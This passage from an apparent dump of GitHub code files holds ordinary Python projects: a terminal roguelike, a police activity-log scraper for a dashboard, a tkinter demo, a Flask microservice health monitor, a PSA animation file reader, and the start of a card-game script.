trigger in range(len(getOutofHere)):\n\t\tfor row in range(len(display)): #feeds rows to display to read\n\t\t\tdisplay[row] = display[row].replace(getOutofHere[trigger], \".\") #makes loading zones look like floor!!\n\t\t\tdisplay[row] = display[row].replace(\"x\", \"+\") #replaces password with trash symbol\n\t\t\t\n\tfor monster in range(len(enemies_currently_generated)):\n\t\tif enemies_currently_generated[monster][4] == mapNum and enemies_currently_generated[monster][1] >= 0:\n\t\t\tdisplay = placeCharacter(enemies_currently_generated[monster][2], enemies_currently_generated[monster][0], enemies_currently_generated[monster][1], display)\n\t\n\tdisplay = placeCharacter(\"@\", player[0], player[1], display) \t\t\t\n\tfor row in range(len(display)): \n\t\tprint(display[row]) #prints 
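# replaceNth()/placeCharacter() above splice one character into an immutable
# string row; the same 1-indexed splice in isolation:
row = "......"
x = 3
row = row[:x - 1] + "@" + row[x:]  # -> "..@..."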
display\n\tdrawUI()\n\t\n\ttime.sleep(.085)#delays input receptor so that character moves naturally\n\t\ndef defineWalls(tile):\n\tnotQuiteMap = [\"#\",\"~\",\">\",\" \",\"[\"]\n\treturn tile in notQuiteMap #returns true if it's a wall\n\ndef isThereABADGUYhere(checkx, checky):\n\tfor BAADGUY in range(len(enemies_currently_generated)):\n\t\tif enemies_currently_generated[BAADGUY][0] == checkx and enemies_currently_generated[BAADGUY][1] == checky and enemies_currently_generated[BAADGUY][4] == mapNum:\\\n\t\t\treturn BAADGUY-0\n\treturn -1\n\ndef hesGonnaGetChu():\n\tglobal enemies_currently_generated, player\n\tfor he in range(len(enemies_currently_generated)):\n\t\tif enemies_currently_generated[he][4] == mapNum and enemies_currently_generated[he][2] != \"L\" and enemies_currently_generated[he][1] >= 0:\n\t\t\tif (enemies_currently_generated[he][0] == player[0] and abs(enemies_currently_generated[he][1] - player[1]) <= 1) or (enemies_currently_generated[he][1] == player[1] and abs(enemies_currently_generated[he][0] - player[0]) <= 1):\n\t\t\t\touchThatHurt(he)\n\t\t\t\ttime.sleep(1/3)\n\t\t\telse:\n\t\t\t\ttries = 100\n\t\t\t\twhile tries > 0:\n\t\t\t\t\tnotOk = False\n\t\t\t\t\tdirectionHeWantToGo = random.randint(1,4)\n\t\t\t\t\ttileHeWantToGoToX = enemies_currently_generated[he][0]\n\t\t\t\t\ttileHeWantToGoToY = enemies_currently_generated[he][1]\n\t\t\t\t\tif directionHeWantToGo == 1:\n\t\t\t\t\t\ttileHeWantToGoToX -= 1\n\t\t\t\t\tif directionHeWantToGo == 2:\n\t\t\t\t\t\ttileHeWantToGoToX += 1\n\t\t\t\t\tif directionHeWantToGo == 3:\n\t\t\t\t\t\ttileHeWantToGoToY -= 1\n\t\t\t\t\tif directionHeWantToGo == 4:\n\t\t\t\t\t\ttileHeWantToGoToY += 1\n\t\t\t\t\tfor otherHe in range(len(enemies_currently_generated)):\n\t\t\t\t\t\tif enemies_currently_generated[otherHe][0] == tileHeWantToGoToX and enemies_currently_generated[otherHe][1] == tileHeWantToGoToY and enemies_currently_generated[otherHe][4] == mapNum:\n\t\t\t\t\t\t\tnotOk = True\n\t\t\t\t\tif not notOk and getTileAt(tileHeWantToGoToX,tileHeWantToGoToY) == \".\" or getTileAt(tileHeWantToGoToX,tileHeWantToGoToY) == \"+\" and tileHeWantToGoToX != player[0] and tileHeWantToGoToY != player[1]:\n\t\t\t\t\t\tenemies_currently_generated[he][0] = tileHeWantToGoToX\n\t\t\t\t\t\tenemies_currently_generated[he][1] = tileHeWantToGoToY\n\t\t\t\t\t\ttries = 0\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\ttries -= 1\n\t\ndef newRoom(tile):\n\tif tile in getOutofHere:\n\t\treturn getOutofHere.index(tile) #returns true if this tile exists\n\telse:\n\t\treturn -1\n\t\t\ndef checkForPizzaPlace(): #this function should see if the next tile is [\n\tglobal exit, player, level\n\tif getTileAt(player[0]-1, player[1]) == \"[\" and password is True:\n\t\tclear()\n\t\tprint(\"Do you have the password? ..... You do! \\n Welcome to Paulie's Pizza. Your cousin's party started 30 minutes ago! Where have you been! \\nAt least you had a good time along the way.\" )\n\t\tif level > 1:\n\t\t\tprint(\"You're already level \" + str(level) + \". Wow!\")\n\t\telse:\n\t\t\tprint(\"...You're only level \" + str(level) + \". 
How did you even get here??\")\n\t\tprint(\"\\n \\n \\n \\n\")\n\t\tprint(\"Y O U W O N\")\n\t\tprint(\"(You can leave now (Press Z))\")\n\t\tlogThatStuff(\"won the game \")\n\t\tsubmitScore()\n\t\thighScoresHere()\n\t\twhile not keyboard.is_pressed('z'): #This makes the map stop being interactable\n\t\t\tcontinue\n\t\texit = True\n\t\t\n\t\n\telif getTileAt(player[0]-1,player[1]) == \"[\" and password is False: #if you don't have the password, it tells you to leave\n\t\tclear()\n\t\tprint(\"Do you have the password? ..... Nah. Doesn't look like it. Beat it, kid.(.... Press 'd' to beat it I guess)\")\n\n\t\t\n\t\t\ndef highScoresHere(): #this prints out the scores in the database using PHP script\n\tprint(urllib.request.urlopen(\"http://localhost/\").read().decode())\n\ndef submitScore(): #this adds your score to the database\n\tglobal name, level, Trash_Counter\n\tprint(urllib.request.urlopen(\"http://localhost/?name=\" + name.replace(\" \",\"_\").replace(\"&\",\"_\") + \"&level=\" + str(level) + \"&trash=\" + str(Trash_Counter)).read().decode())\n\n#def whatsThePassword(): #this function should see if the password paper is in your inventory\n\ndef thePasswordIsInWorld4(): #this is what plays if you find the password and it reads it in your inventory once found\n\tglobal password, wuhtChuWant\n\twhile True:\n\t\tif keyboard.is_pressed('y'):\n\t\t\tlogThatStuff(\"has found the password \")\n\t\t\ta = random.randint(0,9)\n\t\t\tprint(\"You found a scrap piece of paper! It has the word \" +[\"Herby fully loaded\", \"toothbrush\", \"swanky\", \"swiggity swizza gotta get that pizza\", \"something you can't pronounce\", \"OHHHH YEAHHHHHHH\", \"jeepers creepers who's got the pizzers\", \"Are you done yet?\", \"Open sesame\", \"Honey I'm home\"][a]\t+ \" scribbled on it.\")\n\t\t\tpassword = True \n\t\t\tplaceCharacter(\".\", player[0], player[1], worlds[mapNum])\n\t\t\tplaceCharacter(\".\", player[0], player[1], map)\n\t\t\tbreak\n\t\tif keyboard.is_pressed('n'):\n\t\t\tlogThatStuff(\"didn't pick up the password?? \")\n\t\t\twuhtChuWant = True\n\t\t\tdrawMap()\n\t\t\tbreak\n\t\n\treturn password\n\t\ndef didYouDie(HPNow): #this checks your HP. We call this after consuming items and during battle so it kills you if you die\n\tglobal exit\n\tif HPNow <= 0:\n\t\tclear()\n\t\tcolor()\n\t\tprint(\"G A M E O V E R\")\n\t\tsubmitScore()\n\t\tlogThatStuff(\"died... 
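# submitScore() above builds its query string by hand with str.replace; an
# equivalent sketch using urllib.parse handles the escaping generically
# (the localhost endpoint mirrors the one used in this file):
from urllib import parse, request

qs = parse.urlencode({"name": "player one", "level": 3, "trash": 7})
# request.urlopen("http://localhost/?" + qs).read()  # uncomment against a live server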
\")\n\t\twhile not keyboard.is_pressed('z'):\n\t\t\tcontinue\n\t\texit = True\n\t\t\n\t\t\ndef generateItem(): #sword is -1, shield -2, item -3, piece of trash -89\n\twhatKindofStuff = random.randint(0,5) #we use this extra function in conjunction with the one that reads the trash because it allows us to manipulate the probability and looks cleaner\n\tif whatKindofStuff == 1:\n\t\treturn -1\n\telif whatKindofStuff == 2:\n\t\treturn -89\n\telif whatKindofStuff == 3:\n\t\treturn -2\n\telse:\n\t\tquoteunquoteTREASURE = []\n\t\tfor target in range(len(items)):\n\t\t\tfor _ in range(items[target][6]):\n\t\t\t\tquoteunquoteTREASURE.append(target)\n\t\ttrashroulette = random.randint(0, len(quoteunquoteTREASURE)-1)\n\t\treturn quoteunquoteTREASURE[trashroulette]\n\t\t\t#name #HP increase #attack increase #defense increase #level increase #XP increase #rarity #quantity\n\t\t\t\ndef levelUp():\n\tglobal level, XP, attack, defense, maxHP, currentHP\n\tif XP >= 100:\n\t\tXP = XP -100 #this reads how much XP you have and levels you up if it's over 100 \n\t\tincrease_amount = random.randint(0,3) #this decides how many of your stats will increase\n\t\tif increase_amount > 0:\n\t\t\tfor x in range(increase_amount): #this decides which stat will increase\n\t\t\t\twhich_stat =random.randint(0,2)\n\t\t\t\tif which_stat == 0: #this increases HP\n\t\t\t\t\tmaxHP = maxHP + random.randint(2,12)\n\t\t\t\t\tprint(\"You improved your HP!\")\n\t\t\t\telif which_stat == 1: #this increases attack\n\t\t\t\t\tattack = attack + random.randint(1,3)\n\t\t\t\t\tprint(\"You improved your attack!\")\n\t\t\t\telse:\n\t\t\t\t\tdefense = defense + random.randint(1,3) #this increases defense\n\t\t\t\t\tprint(\"You improved your defense!\")\n\t\tcurrentHP = maxHP #when you level up you're revived to max health\n\t\tlevel +=1\n\t\tdrawMap()\n\t\tlogThatStuff(\"leveled up \")\n\t\t\ndef weShouldAddSomeEnemies(): #adds enemies to the world\n\tglobal enemies, enemies_in_worlds, mapNum, max_x, max_y\n\tif enemies_in_worlds[mapNum] == 0:\n\t\thowMany = random.randint(1,5)\n\t\tfor x in range(howMany):\n\t\t\twhile True:\n\t\t\t\tbadguyx = random.randint(0, max_x-1)\n\t\t\t\tbadguyy = random.randint(0, max_y-1)\n\t\t\t\tif getTileAt(badguyx, badguyy) == \".\" or getTileAt(badguyx, badguyy) == \"+\":\n\t\t\t\t\tmonsterrarity = []\n\t\t\t\t\tfor target in range(len(enemies)):\n\t\t\t\t\t\tfor _ in range(enemies[target][5]):\n\t\t\t\t\t\t\tmonsterrarity.append(enemies[target][6])\n\t\t\t\t\tbadguyroulette = monsterrarity[random.randint(0, len(monsterrarity)-1)]\n\t\t\t\t\t#print(badguyroulette)\n\t\t\t\t\t#time.sleep(1)\n\t\t\t\t\tthisguysHP = 0\n\t\t\t\t\tthisguysSymbol = \"*\"\n\t\t\t\t\tfor enemytype in range(len(enemies)):\n\t\t\t\t\t\tif enemies[enemytype][6] == badguyroulette:\n\t\t\t\t\t\t\tthisguysHP = enemies[enemytype][1]\n\t\t\t\t\t\t\tthisguysSymbol = enemies[enemytype][7]\n\t\t\t\t\t\t\tthisguysType = enemies[enemytype][6]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tenemies_currently_generated.append([badguyx,badguyy,thisguysType,thisguysHP,mapNum,thisguysSymbol])\n\t\t\t\t\tenemies_in_worlds[mapNum] += 1\n\t\t\t\t\tbreak\n\ndef isItDead(guy): #checks if enemy is dead\n\tglobal enemies_currently_generated, enemies, XP, mapNum\n\ttype = -1\n\tfor x in range(len(enemies)):\n\t\tif enemies[x][6] == enemies_currently_generated[guy][2]:\n\t\t\ttype = x\n\t\t\tbreak\n\tif enemies_currently_generated[guy][3] <= 0:\n\t\tenemies_in_worlds[mapNum] -= 1\n\t\tdel enemies_currently_generated[guy]\n\t\tXP += 
enemies[type][4]\n\t\tlevelUp()\n\t\tlogThatStuff(\" has killed an enemy \")\n\t\t\ndef timeToFight(guy):\n\tglobal currentHP, attack, enemies_currently_generated, enemies\n\ttype = -1\n\tfor x in range(len(enemies)):\n\t\tif enemies[x][6] == enemies_currently_generated[guy][2]:\n\t\t\ttype = x\n\t\t\tbreak\n\tprint(\"A \" + str(enemies[type][0]) + \" is in your way. Beat them up!\")\n\tenemies_currently_generated[guy][3] -= attack -enemies[type][3]\n\tisItDead(guy)\n\ttime.sleep(1.5)\n\tdrawMap()\n\t\n\t\ndef ouchThatHurt(guy):\n\tglobal currentHP, attack, enemies_currently_generated, enemies\n\ttype = -1\n\tfor x in range(len(enemies)):\n\t\tif enemies[x][6] == enemies_currently_generated[guy][2]:\n\t\t\ttype = x\n\t\t\tbreak\n\tprint(\"A \" + enemies[type][0] + \" attacked you!\")\n\tcurrentHP -= max(enemies[type][2] - random.randint(0,defense), 0)\n\tprint(\"You lost HP!\")\n\tdidYouDie(currentHP)\n\ttime.sleep(1)\n\tdrawMap()\n\n\t\ndef omNomTheNomNoms():\n\tglobal items, currentHP, maxHP, attack, defense, level, XP\n\tthenumberoftypesofitemsthatwehaveavailableatthemoment = 0\n\tfor f in range(len(items)): #this figures out how many items we have\n\t\tif items[f][7] > 0: #if you have more than one in your inventory\n\t\t\tthenumberoftypesofitemsthatwehaveavailableatthemoment += 1 #add it to how many types of items we have\n\t\t\tif keyboard.is_pressed(str(thenumberoftypesofitemsthatwehaveavailableatthemoment)): #this checks the number associated with the item. An \"ID\" if you will \n\t\t\t\tcurrentHP += items[f][1] #affects HP\n\t\t\t\thesGonnaGetChu()\n\t\t\t\tif currentHP > maxHP:\n\t\t\t\t\tcurrentHP = maxHP #makes sure you can't go over max HP\n\t\t\t\tattack += items[f][2] #affects attack\n\t\t\t\tdefense += items[f][3] #affects defense\n\t\t\t\tlevel += items[f][4] #affects level\n\t\t\t\tXP += items[f][5] #affects XP\n\t\t\t\titems[f][7] -= 1 #decreases one from your inventory\n\t\t\t\tdrawMap()\n\t\t\t\tprint(\"You ate it! 
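# The combat math above, factored out: your hits subtract the enemy's flat
# defense from your attack, while incoming hits subtract a random slice of
# your defense and are floored at zero.
import random

def incoming_damage(enemy_attack, player_defense):
    return max(enemy_attack - random.randint(0, player_defense), 0)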
\ndef omNomTheNomNoms():\n\tglobal items, currentHP, maxHP, attack, defense, level, XP\n\tthenumberoftypesofitemsthatwehaveavailableatthemoment = 0\n\tfor f in range(len(items)): #this figures out how many items we have\n\t\tif items[f][7] > 0: #if you have more than one in your inventory\n\t\t\tthenumberoftypesofitemsthatwehaveavailableatthemoment += 1 #add it to how many types of items we have\n\t\t\tif keyboard.is_pressed(str(thenumberoftypesofitemsthatwehaveavailableatthemoment)): #this checks the number associated with the item. An \"ID\" if you will \n\t\t\t\tcurrentHP += items[f][1] #affects HP\n\t\t\t\thesGonnaGetChu()\n\t\t\t\tif currentHP > maxHP:\n\t\t\t\t\tcurrentHP = maxHP #makes sure you can't go over max HP\n\t\t\t\tattack += items[f][2] #affects attack\n\t\t\t\tdefense += items[f][3] #affects defense\n\t\t\t\tlevel += items[f][4] #affects level\n\t\t\t\tXP += items[f][5] #affects XP\n\t\t\t\titems[f][7] -= 1 #decreases one from your inventory\n\t\t\t\tdrawMap()\n\t\t\t\tprint(\"You ate it! Check out your stats!\") #generic print message\n\t\t\t\tlevelUp() #checks to see if you leveled up \n\t\t\t\tdidYouDie(currentHP) #checks if you died\n\t\t\t\ttime.sleep(.2)\n\t\t\t\tlogThatStuff(\"ate an item \")\n\nmain()\n\n# cd Desktop/Python Files/Final 2","repo_name":"Judas-Michael/DetroitTheGame","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":28961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24974327118","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nfrom yattag import Doc\nimport dashboard\nSLASH_CODE = '%2F'\n\ncrime_table = None\n\noffset = 0\nresults_found = False\nwhile not results_found:\n    try:\n        #Try finding table results for a one-week window, if nothing then IndexError\n        end_date = datetime.now() - timedelta(days=7 * offset)\n        start_date = end_date - timedelta(days=7) #one-week window ending at end_date\n        end_date_url = end_date.strftime('%Y/%#m/%#d').replace('/', SLASH_CODE)\n        start_date_url = start_date.strftime('%Y/%#m/%#d').replace('/', SLASH_CODE)\n        url = f'https://oupolice.com/clery/activity-log/?crimemonth={start_date_url}&crimemonth2={end_date_url}'\n        print(f'[crimes] Getting activity for {start_date.strftime(\"%#m/%#d/%Y\")} - {end_date.strftime(\"%#m/%#d/%Y\")}')\n        print(f'[crimes] Querying: {url}')\n        page = requests.get(url)\n        soup = BeautifulSoup(page.content, \"html.parser\")\n        crime_table = soup.find_all('table', {'class': 'crimetable'})[0]\n        results_found = True\n    except IndexError as e:\n        #Need to go back another week\n        results_found = False\n        offset += 1\n\nheading = crime_table.find_all('tr')[0]\ncrime_rows = crime_table.find_all('tr')[1:]\nmost_recent_five = crime_rows[-5:]\n\nprint('[crimes] Writing HTML...')\ndoc, tag, text = Doc().tagtext()\nwith tag('p'):\n    text('5 most recent activity entries reported by OUPD:')\nwith tag('table', klass='table table-striped table-hover'):\n    with tag('tbody'):\n        with tag('tr'):\n            with tag('th'):\n                text('Reported')\n            with tag('th'):\n                text('Nature')\n            with tag('th'):\n                text('Address')\n        for row in most_recent_five:\n            crime_info = row.find_all('td')\n            reported = crime_info[2].text.strip()\n            nature = crime_info[1].text.strip()\n            address = crime_info[4].text.strip()\n            with tag('tr'):\n                with tag('td'):\n                    text(reported)\n                with tag('td'):\n                    text(nature)\n                with tag('td'):\n                    text(address)\nhtml = doc.getvalue()\nprint('[crimes] Posting to widget...')\npost = dashboard.post_to_widget('crimes', html)\nprint(post)
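\n# NOTE (added, illustrative): SLASH_CODE hand-encodes '/' for the query string;\n# urllib.parse.quote does the same without a hand-rolled constant, e.g.:\n#   from urllib.parse import quote\n#   end_date_url = quote(end_date.strftime('%Y/%m/%d'), safe='')\n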
","repo_name":"PhysCorp/Dashboard.LOL","sub_path":"python/widgets/crimes.py","file_name":"crimes.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"27270252982","text":"import tkinter as tk\n \nwindow = tk.Tk()\nwindow.title('My Window')\nwindow.geometry('300x300')\ngoods = {\"Рыба\":100}\n \nl = tk.Label(window, bg='white', width=20, text='empty')\nl.pack()\n\n \ndef sum_up(value):\n\tl.config(text=value) #update the label through config; plain attribute assignment does not redraw the widget\n\nvar1 = tk.IntVar()\nvar2 = tk.IntVar()\nc1 = tk.Checkbutton(window, text='Рыба',variable=var1, onvalue=1, offvalue=0, command=lambda: sum_up(goods['Рыба']))\nc1.pack()\n\nframe = tk.Frame(window, width = 100, height = 100)\nframe.bind(\"<Button-1>\", sum_up)\nframe.pack()\nprint(var1.get())\n\nwindow.mainloop()\n
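\n# NOTE (added for clarity): Checkbutton's command option must be a callable.\n# Writing command=sum_up(goods['Рыба']) would run the function once at\n# construction time and register its return value (None); the lambda above\n# defers the call until the button is actually toggled.\n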
","repo_name":"mimilasyxa/python","sub_path":"lab3/1_2.py","file_name":"1_2.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13548382691","text":"from typing import Any\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask_jwt_extended import jwt_required, create_access_token, get_jwt_identity\nimport time\nfrom random import randrange\nimport logging\nimport sys\nimport requests\nimport signal\nfrom threading import Thread\nfrom datetime import datetime, timedelta\n\nclass Llamadas():\n\n    def llamarMicroservicio1(self, microservicio): \n\n        fallo1 = None\n        fallo2 = None \n        fallo3 = None\n\n        loggerName = 'MonitorMicroservicio1'\n        urlMicroservicio = 'https://microservicio-uno-grupo5.herokuapp.com/registropaciente/ping'\n        if(microservicio == 2): \n            loggerName = 'MonitorMicroservicio2'\n            urlMicroservicio = 'https://microservicio-dos-grupo5.herokuapp.com/registropaciente/ping'\n        else:\n            if(microservicio == 3):\n                loggerName = 'MonitorMicroservicio3'\n                urlMicroservicio = 'https://microservicio-tres-grupo5.herokuapp.com/registropaciente/ping'\n        \n        # create logger\n        logger = logging.getLogger(loggerName)\n        logger.setLevel(logging.DEBUG)\n        logger.flush = sys.stdout.flush\n\n        # create console handler and set level to debug\n        ch = logging.StreamHandler()\n        ch.setLevel(logging.DEBUG)\n\n        # create formatter\n        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n\n        # add formatter to ch\n        ch.setFormatter(formatter)\n\n        # add ch to logger\n        logger.addHandler(ch)\n\n\n        inicio = datetime.now()\n        fin = datetime.now() + timedelta(seconds=180)\n        while fin > datetime.now():\n            fallo = None\n            try:\n                r = requests.get(urlMicroservicio, timeout=10)\n                if(r.status_code != 200):\n                    logger.debug('Error en microservicio #' + str(microservicio) + ' Código respuesta: '+ str(r.status_code) )\n                    fallo = datetime.now() \n            except:\n                logger.debug('Error en microservicio #' + str(microservicio) + ': timeout' )\n                fallo = datetime.now()\n            if(fallo != None):\n                limiteInferior = fallo - timedelta(seconds=20)\n                limiteSuperior = fallo\n                fallosEnRango = 1\n                if(fallo1 == None):\n                    fallo1 = fallo\n                    fallo = None\n                else:\n                    if(fallo1 < limiteInferior or fallo1 > limiteSuperior):\n                        fallo1 = fallo\n                        fallo = None\n                    else:\n                        fallosEnRango = fallosEnRango + 1\n                        if(fallo2 == None):\n                            fallo2 = fallo\n                            fallo = None\n                        else:\n                            if(fallo2 < limiteInferior or fallo2 > limiteSuperior):\n                                fallo2 = fallo\n                                fallo = None\n                            else:\n                                fallosEnRango = fallosEnRango + 1\n                                if(fallo3 == None):\n                                    fallo3 = fallo\n                                    fallo = None\n                                else:\n                                    if(fallo3 < limiteInferior or fallo3 > limiteSuperior):\n                                        fallo3 = fallo\n                                        fallo = None\n                                    else:\n                                        fallosEnRango = fallosEnRango + 1\n                                        if(fallosEnRango == 3):\n                                            logger.debug('Microservicio #' + str(microservicio) + ' en estado de fallo. Rango errores entre ' + str(limiteInferior) + ' y ' + str(limiteSuperior))\n                                            fallo1 = None\n                                            fallo2 = None\n                                            fallo3 = None\n                                            fallosEnRango = 0\n            time.sleep(1)\n        logger.removeHandler(ch)\n\nclass VistaMonitorRegistroPaciente(Resource):\n\n    def get(self):\n\n        call = Llamadas()\n\n        threads = []\n        # create the threads\n        t1 = Thread(target=call.llamarMicroservicio1, args=(1,))\n        t2 = Thread(target=call.llamarMicroservicio1, args=(2,))\n        t3 = Thread(target=call.llamarMicroservicio1, args=(3,))\n        threads.append(t1)\n        threads.append(t2)\n        threads.append(t3)\n        t1.start()\n        t2.start()\n        t3.start()\n\n        # wait for the threads to finish\n        for t in threads:\n            t.join()\n\n        return 'OK', 200
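\n# NOTE (added, illustrative): the fallo1/fallo2/fallo3 bookkeeping above keeps\n# the last three failure timestamps and flags a failure state when all three\n# fall inside one 20-second window. An equivalent sketch with a pruned list:\n#   failures = [t for t in failures if now - t <= timedelta(seconds=20)]\n#   if len(failures) >= 3: logger.debug('failure state')\n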
","repo_name":"jmorenotuniandes/miso-arquitectura-agil-grupo-05","sub_path":"monitor/flaskr/vistas/vistas.py","file_name":"vistas.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"24256992891","text":"from .data import *\nimport ctypes\nimport numpy as np\n\n\nclass PsaReader(object):\n    \"\"\"\n    This class will read the sequences and bone information immediately upon instantiation and hold onto a file handle.\n    The key data is not read into memory upon instantiation due to its potentially very large size.\n    To read the key data for a particular sequence, call `read_sequence_keys`.\n    \"\"\"\n    def __init__(self, path):\n        self.keys_data_offset: int = 0\n        self.fp = open(path, 'rb')\n        self.psa: Psa = self._read(self.fp)\n\n    @property\n    def bones(self):\n        return self.psa.bones\n\n    @property\n    def sequences(self):\n        return self.psa.sequences\n\n    @staticmethod\n    def _read_types(fp, data_class: ctypes.Structure, section: Section, data):\n        buffer_length = section.data_size * section.data_count\n        buffer = fp.read(buffer_length)\n        offset = 0\n        for _ in range(section.data_count):\n            data.append(data_class.from_buffer_copy(buffer, offset))\n            offset += section.data_size\n\n    def read_sequence_data_matrix(self, sequence_name: str):\n        sequence = self.psa.sequences[sequence_name]\n        keys = self.read_sequence_keys(sequence_name)\n        bone_count = len(self.bones)\n        matrix_size = sequence.frame_count, bone_count, 7\n        matrix = np.zeros(matrix_size)\n        keys_iter = iter(keys)\n        for frame_index in range(sequence.frame_count):\n            for bone_index in range(bone_count):\n                matrix[frame_index, bone_index, :] = list(next(keys_iter).data)\n        return matrix\n\n    def read_sequence_keys(self, sequence_name: str) -> List[Psa.Key]:\n        \"\"\" Reads and returns the key data for a sequence.\n\n        :param sequence_name: The name of the sequence.\n        :return: A list of Psa.Keys.\n        \"\"\"\n        # Set the file reader to the beginning of the keys data\n        sequence = self.psa.sequences[sequence_name]\n        data_size = ctypes.sizeof(Psa.Key)\n        bone_count = len(self.psa.bones)\n        buffer_length = data_size * bone_count * sequence.frame_count\n        sequence_keys_offset = self.keys_data_offset + (sequence.frame_start_index * bone_count * data_size)\n        self.fp.seek(sequence_keys_offset, 0)\n        buffer = self.fp.read(buffer_length)\n        offset = 0\n        keys = []\n        for _ in range(sequence.frame_count * bone_count):\n            key = Psa.Key.from_buffer_copy(buffer, offset)\n            keys.append(key)\n            offset += data_size\n        return keys\n\n    def _read(self, fp) -> Psa:\n        psa = Psa()\n        while fp.read(1):\n            fp.seek(-1, 1)\n            section = Section.from_buffer_copy(fp.read(ctypes.sizeof(Section)))\n            if section.name == b'ANIMHEAD':\n                pass\n            elif section.name == b'BONENAMES':\n                PsaReader._read_types(fp, Psa.Bone, section, psa.bones)\n            elif section.name == b'ANIMINFO':\n                sequences = []\n                PsaReader._read_types(fp, Psa.Sequence, section, sequences)\n                for sequence in sequences:\n                    psa.sequences[sequence.name.decode()] = sequence\n            elif section.name == b'ANIMKEYS':\n                # Skip keys on this pass. We will keep this file open and read from it as needed.\n                self.keys_data_offset = fp.tell()\n                fp.seek(section.data_size * section.data_count, 1)\n            elif section.name in [b'SCALEKEYS']:\n                fp.seek(section.data_size * section.data_count, 1)\n            else:\n                raise RuntimeError(f'Unrecognized section \"{section.name}\"')\n        return psa
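\n\n# NOTE (added, illustrative usage sketch -- the file name is hypothetical):\n#   reader = PsaReader('example.psa')\n#   first_sequence = next(iter(reader.sequences))\n#   keys = reader.read_sequence_keys(first_sequence)\n#   matrix = reader.read_sequence_data_matrix(first_sequence)  # (frames, bones, 7)\n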
","repo_name":"SilverDash/io_scene_psk_psa","sub_path":"io_scene_psk_psa/psa/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"6082118289","text":"#-------------------------------------------------------------------------------\r\n# Name:        Hero Realms\r\n# Purpose:     An attempt on creating a python code for a computer version of/\r\n#              a board game \"Hero Realms\".\r\n#\r\n# Author:      Julia Szuminska\r\n#\r\n# Created:     02/06/2020\r\n# Copyright:   (c) Julia 2020\r\n# Licence:     \r\n#-------------------------------------------------------------------------------\r\n# Import section\r\nimport random\r\n\r\n\r\n\r\n# Format of the deck and cards:\r\n# Deck is a dictionary containing cards. Cards are individual dictionaries containing all properties of a card.\r\n# Example:\r\n# deck = {'dragon': {'type':'imperial', 'cost': 5, 'damage': 8, 'gold':0, 'healing': 0}, ...}\r\n\r\nstarterDeck = {'dagger': {'type': 'default', 'damage': 1, 'gold':0, 'healing': 0}, \\\r\n               'shortsword': {'type': 'default', 'damage': 2, 'gold':0, 'healing': 0}, \\\r\n               'coin1': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'coin2': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'coin3': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'coin4': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'coin5': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'coin6': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'coin7': {'type': 'default', 'damage': 0, 'gold':1, 'healing': 0}, \\\r\n               'ruby': {'type': 'default', 'damage': 0, 'gold':2, 'healing': 0}}\r\n\r\n\r\n# A function to create a deck based on file\r\n\r\ndef createDeckDict(filename):\r\n    #Getting card information from a file, storing it in a list of lists\r\n    with open(filename, 'r') as f:\r\n        lines=f.readlines()\r\n    splitLines= []\r\n    for line in lines:\r\n        splitLine = line.strip('\\n').split(',')\r\n        splitLines += [splitLine]\r\n\r\n    #Putting card properties in a dictionary; cast the numeric CSV fields to int so the gold/damage/healing counters can do arithmetic on them\r\n    deckDict={}\r\n    for line in splitLines:\r\n        deckDict[line[0]] = {'type': line[5], 'cost': int(line[4]), 'damage': int(line[1]),\\\r\n                             'gold': int(line[2]), 'healing': int(line[3])}\r\n    return deckDict\r\n\r\n# A function to create a list with keys from a dictionary - this can be shuffled\r\ndef cardDictToL(givenD):\r\n    cardNames = list(givenD.keys())\r\n    return cardNames\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Setting up initial sets of cards\r\n\r\n# starterDeck - a dictionary with initial cards\r\n\r\n# starterDeckL - a list with names of initial cards - can be shuffled\r\nstarterDeckL = cardDictToL(starterDeck)\r\nprint(starterDeckL)\r\n\r\n\r\n# deckD - a full deck dictionary\r\ndeckD = createDeckDict('cards.csv')\r\n\r\n# deckL - a full deck list- can be shuffled\r\ndeckL = cardDictToL(deckD)\r\n\r\n# EXTRA set - a dictionary with full deck, not to be touched!\r\n\r\nsaverDeck = createDeckDict('cards.csv')\r\n\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# FUNCTIONS\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n# A function to shuffle cards, should take a set of cards- a list.\r\n\r\ndef shuffle(cardSet):\r\n    random.shuffle(cardSet) #shuffles the list in place\r\n    return cardSet\r\n\r\n\r\n# Function definition: changeTurn()\r\n# When called, the function moves on to the next player\r\n\r\ndef changeTurn(currentPlayer, turnEnded):\r\n    if turnEnded == True:\r\n        if currentPlayer == noOfPlayers:\r\n            currentPlayer = 0\r\n            return currentPlayer\r\n        else:\r\n            currentPlayer = 